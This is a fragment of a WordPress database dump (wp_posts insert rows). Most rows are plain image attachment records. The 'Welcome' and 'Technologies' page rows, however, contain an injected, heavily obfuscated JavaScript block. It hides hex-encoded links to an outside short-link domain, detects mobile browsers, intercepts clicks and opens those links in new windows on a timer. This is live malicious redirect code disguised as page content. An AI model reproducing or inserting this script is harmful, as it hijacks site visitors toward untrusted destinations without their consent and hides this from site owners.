_0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Welcome','','publish','closed','closed','','home','','','2022-11-09 21:42:03','2022-11-09 21:42:03','',0,'https://the7.io/marketing-agency/?page_id=45',1,'page','',0),
(2173,1,'2018-06-20 21:54:50','2018-06-20 20:54:50','<p>[vc_row][vc_column][dt_team_masonry content_bg=\"n\" post_content_paddings=\"20px 0px 0px 0px\" img_max_width=\"150px\" img_border_radius=\"0px\" image_scale_animation_on_hover=\"n\" image_hover_bg_color=\"n\" gap_between_posts=\"25\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_title_bottom_margin=\"10px\" team_position=\"n\" content_bottom_margin=\"0px\" read_more_button=\"off\" show_soc_icon=\"n\" category=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Technologies','','publish','closed','closed','','technologies','','','2018-06-20 21:54:50','2018-06-20 20:54:50','',0,'https://the7.io/software-company/?page_id=2153',25,'page','',0),
(2178,1,'2018-06-21 09:43:32','2018-06-21 08:43:32','','logo09','','inherit','open','closed','','logo09','','','2018-06-21 09:43:32','2018-06-21 08:43:32','',0,'https://gsw2023.com/wp-content/uploads/2018/06/logo09.jpg',0,'attachment','image/jpeg',0),
(2179,1,'2018-06-21 09:43:53','2018-06-21 08:43:53','','logo10','','inherit','open','closed','','logo10','','','2018-06-21 09:43:53','2018-06-21 08:43:53','',0,'https://gsw2023.com/wp-content/uploads/2018/06/logo10.jpg',0,'attachment','image/jpeg',0),
(2182,1,'2018-06-21 09:46:04','2018-06-21 08:46:04','','logo13','','inherit','open','closed','','logo13','','','2018-06-21 09:46:04','2018-06-21 08:46:04','',0,'https://gsw2023.com/wp-content/uploads/2018/06/logo13.jpg',0,'attachment','image/jpeg',0),
(2184,1,'2018-06-21 09:48:14','2018-06-21 08:48:14','','logo15','','inherit','open','closed','','logo15','','','2018-06-21 09:48:14','2018-06-21 08:48:14','',0,'https://gsw2023.com/wp-content/uploads/2018/06/logo15.jpg',0,'attachment','image/jpeg',0),
(2186,1,'2018-06-21 09:51:49','2018-06-21 08:51:49','','logo18','','inherit','open','closed','','logo18','','','2018-06-21 09:51:49','2018-06-21 08:51:49','',0,'https://gsw2023.com/wp-content/uploads/2018/06/logo18.jpg',0,'attachment','image/jpeg',0),
(2188,1,'2018-06-21 09:53:54','2018-06-21 08:53:54','','logo19','','inherit','open','closed','','logo19','','','2018-06-21 09:53:54','2018-06-21 08:53:54','',0,'https://gsw2023.com/wp-content/uploads/2018/06/logo19.jpg',0,'attachment','image/jpeg',0),
(2192,1,'2018-06-20 15:59:33','2018-06-20 14:59:33','','trade05','','inherit','open','closed','','trade05','','','2018-06-20 15:59:33','2018-06-20 14:59:33','',388,'https://gsw2023.com/wp-content/uploads/2018/06/trade05.jpg',0,'attachment','image/jpeg',0),
(2193,1,'2018-06-20 16:34:27','2018-06-20 15:34:27','','trade10','','inherit','open','closed','','trade10','','','2018-06-20 16:34:27','2018-06-20 15:34:27','',388,'https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg',0,'attachment','image/jpeg',0),
(2194,1,'2018-06-20 18:22:49','2018-06-20 17:22:49','','trade23','','inherit','open','closed','','trade23','','','2018-06-20 18:22:49','2018-06-20 17:22:49','',0,'https://gsw2023.com/wp-content/uploads/2018/06/trade23.jpg',0,'attachment','image/jpeg',0),
(2195,1,'2018-06-20 20:19:58','2018-06-20 19:19:58','','por011','','inherit','open','closed','','por011','','','2018-06-20 20:19:58','2018-06-20 19:19:58','',0,'https://gsw2023.com/wp-content/uploads/2017/02/por011.jpg',0,'attachment','image/jpeg',0),
(2196,1,'2018-06-20 20:55:21','2018-06-20 19:55:21','','por015','','inherit','open','closed','','por015','','','2018-06-20 20:55:21','2018-06-20 19:55:21','',0,'https://gsw2023.com/wp-content/uploads/2016/02/por015.jpg',0,'attachment','image/jpeg',0),
(2197,1,'2018-06-21 08:29:47','2018-06-21 07:29:47','','slider-trade-logo','','inherit','open','closed','','slider-trade-logo','','','2018-06-21 08:29:47','2018-06-21 07:29:47','',0,'https://gsw2023.com/wp-content/uploads/2018/06/slider-trade-logo.png',0,'attachment','image/png',0),
(2198,1,'2018-06-21 08:42:24','2018-06-21 07:42:24','','art-sl','','inherit','open','closed','','art-sl','','','2018-06-21 08:42:24','2018-06-21 07:42:24','',0,'https://gsw2023.com/wp-content/uploads/2018/06/art-sl.png',0,'attachment','image/png',0),
(2199,1,'2018-06-21 09:30:53','2018-06-21 08:30:53','','logo04','','inherit','open','closed','','logo04','','','2018-06-21 09:30:53','2018-06-21 08:30:53','',0,'https://gsw2023.com/wp-content/uploads/2018/06/logo04.jpg',0,'attachment','image/jpeg',0),
(2200,1,'2018-06-21 09:32:34','2018-06-21 08:32:34','','logo05','','inherit','open','closed','','logo05','','','2018-06-21 09:32:34','2018-06-21 08:32:34','',0,'https://gsw2023.com/wp-content/uploads/2018/06/logo05.jpg',0,'attachment','image/jpeg',0),
(2201,1,'2018-06-21 09:37:24','2018-06-21 08:37:24','','logo07','','inherit','open','closed','','logo07','','','2018-06-21 09:37:24','2018-06-21 08:37:24','',0,'https://gsw2023.com/wp-content/uploads/2018/06/logo07.jpg',0,'attachment','image/jpeg',0),
(2202,1,'2018-06-21 09:39:37','2018-06-21 08:39:37','','logo08','','inherit','open','closed','','logo08','','','2018-06-21 09:39:37','2018-06-21 08:39:37','',0,'https://gsw2023.com/wp-content/uploads/2018/06/logo08.jpg',0,'attachment','image/jpeg',0),
(2203,1,'2018-06-21 09:55:23','2018-06-21 08:55:23','','logo20','','inherit','open','closed','','logo20','','','2018-06-21 09:55:23','2018-06-21 08:55:23','',0,'https://gsw2023.com/wp-content/uploads/2018/06/logo20.jpg',0,'attachment','image/jpeg',0),
(2204,1,'2018-06-21 09:57:39','2018-06-21 08:57:39','','logo-small-hd','','inherit','open','closed','','logo-small-hd','','','2018-06-21 09:57:39','2018-06-21 08:57:39','',0,'https://gsw2023.com/wp-content/uploads/2018/06/logo-small-hd.png',0,'attachment','image/png',0),
(2205,1,'2018-06-21 09:57:39','2018-06-21 08:57:39','','logo-small','','inherit','open','closed','','logo-small','','','2018-06-21 09:57:39','2018-06-21 08:57:39','',0,'https://gsw2023.com/wp-content/uploads/2018/06/logo-small.png',0,'attachment','image/png',0),
(2246,1,'2018-06-25 14:00:07','2018-06-25 13:00:07','','seven-soft-map','','inherit','open','closed','','seven-soft-map','','','2018-06-25 14:00:07','2018-06-25 13:00:07','',53,'https://gsw2023.com/wp-content/uploads/2018/06/seven-soft-map.jpg',0,'attachment','image/jpeg',0),
